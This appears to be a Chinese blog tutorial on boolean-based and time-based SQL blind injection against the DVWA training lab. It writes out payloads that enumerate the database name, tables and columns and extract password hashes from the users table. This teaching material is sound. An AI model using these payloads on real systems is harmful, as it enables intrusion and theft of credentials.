sql盲注

文章目录

布尔盲注

介绍:在网页只给你两种回显的时候是用,类似于布尔类型的数据,1表示正确,0表示错误。
特点:思路简单,步骤繁琐且麻烦。
核心函数:

  1. length()函数
  2. substr()函数

下面以dvwa靶场为例来介绍布尔盲注的过程。

首先试一下这个业务流程,输入1和100显示是不同的,但是他不会回显你具体数据。

在这里插入图片描述
在这里插入图片描述
1.我们测试一下是否存在sql注入的漏洞。

1 and 1=1(exist)
1 and 1=2(exist)
1' and 1=1#(exist)
1' and 1=2#(missing)

这里我们可以基本确定是字符型的布尔盲注的sql漏洞了。
1.猜测数据库库名

1' and length(database())=1 #
1' and length(database())=2 #
1' and length(database())=3 #
1' and length(database())=4 #

猜到4的时候击中目标,因此数据库的库名长度为4
在这里插入图片描述
2.猜测库名的第一个字母

1' and ascii(substr(database(),1,1))>65 #
1' and ascii(substr(database(),1,1))<122 #
...
...
...

在这里插入图片描述
由于步骤过于麻烦,我们用bp直接批量尝试。
在这里插入图片描述
可以看出当payload为100时数据包的回显长度从4604一下子跳到了4617,查ascii表可以判断出第一个字母是d,以此类推可以判断出数据库名字为dvwa
在这里插入图片描述

3.猜表名
这里测出来有两张表

1' and (select count(table_name) from information_schema.tables where table_schema=database())>10 #(missing)
1' and (select count(table_name) from information_schema.tables where table_schema=database())>1 #(exist)
1' and (select count(table_name) from information_schema.tables where table_schema=database())>2 #(missing)
1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 #(exist)

分别猜两张表的长度,再猜表名。猜测方法跟步骤2中的方法一致。
猜长度

1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>10 #(missing)
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>5 #(missing)
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>7 #(missing)
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>8 #(missing)
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9#(exist)

猜表名,为guestbook和users

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>88 #
...
...
...

4.猜列名
这一步其实也是不停的重复,但是我们可以带点猜测的意思,想想users表里会有什么列,password之类重要的。

1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='password')=1 #

5.猜字段值
二分法,猜测字段

1' and length(substr((select password from users limit 0,1),1))=32 #(32位一般都是MD5加密)
1' and ascii(substr((select password from users limit 0,1),1,1))=64 #(32位的长度强烈建议写一个脚本来跑)
...
...
...

时间盲注

原理:
时间盲注的核心思想是通过向SQL查询中注入特定的延时函数(如MySQL中的SLEEP()函数),使数据库的响应时间变长。
攻击者通过比较注入延时语句和未注入语句时的响应时间差异,来推断数据库中的某些信息。

常用函数:
SLEEP()函数
BENCHMARK()函数
WAITFOR DELAY ‘time’

由于上面布尔盲注写了基本思路,这里大概讲一下。
主要是根据页面的响应时间来判断你的语句是否执行成功。后面配合IF(condition, SLEEP(seconds), 0)这种形式的语句来完成注入。
在这里插入图片描述
1.确定注入点

1' and sleep(5) #(明显500ms的延迟表示语句执行成功,存在字符型的漏洞)

2.猜库名
先猜库的长度

1' and if(length(database())=4,sleep(5),1) #

再猜库的具体字母

1' and if(ascii(substr(database(),1,1))=100,sleep(5),1)#
...
...
...

可以得出库名为dvwa
3.猜表名
先猜几个表

1' and if((select count(table_name) from information_schema.tables where table_schema=database() )=2,sleep(5),1)#

再分别二分法猜表名

1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) #
...
...
...

最后的两个表名为guestbook和users
4.猜列
先猜有几列

1' and if((select count(column_name) from information_schema.columns where table_name= ’users’)=8,sleep(5),1)#

再猜长度

1and if(length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=7,sleep(5),1)

最后二分法猜具体字母
5.猜字段
具体见布尔盲注,基本上一模一样

相关推荐

  1. SQL漏洞

    2024-07-12 17:54:04       38 阅读
  2. <span style='color:red;'>sql</span><span style='color:red;'>盲</span><span style='color:red;'>注</span>

    sql

    2024-07-12 17:54:04      23 阅读
  3. SQL注入:时间

    2024-07-12 17:54:04       24 阅读

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-07-12 17:54:04       67 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-07-12 17:54:04       71 阅读
  3. 在Django里面运行非项目文件

    2024-07-12 17:54:04       58 阅读
  4. Python语言-面向对象

    2024-07-12 17:54:04       69 阅读

热门阅读

  1. 数据库之锁

    2024-07-12 17:54:04       24 阅读
  2. kotlin distinctBy 使用

    2024-07-12 17:54:04       23 阅读
  3. 嵌入式Qt开发C++编程基础部分万字总结

    2024-07-12 17:54:04       19 阅读
  4. Oracle PL/SQL 循环批量执行存储过程

    2024-07-12 17:54:04       22 阅读
  5. 做支付需要了解哪些行业知识

    2024-07-12 17:54:04       21 阅读
  6. date 命令学习

    2024-07-12 17:54:04       18 阅读
  7. 解决 idea git提交后,文件状态不刷新

    2024-07-12 17:54:04       21 阅读
  8. 如何理解李彦宏说的”不要卷模型,要卷应用

    2024-07-12 17:54:04       24 阅读